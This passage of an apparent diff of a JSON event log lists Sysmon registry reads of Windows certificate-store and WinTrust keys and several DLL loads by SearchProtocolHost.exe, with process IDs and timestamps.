"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mssph.dll", - "image_path": "C:\\Windows\\System32\\mssph.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", - "registry_value": "SyncRootManager", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "authz.dll", - "image_path": "C:\\Windows\\System32\\authz.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.StateRepositoryPS.dll", - "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", 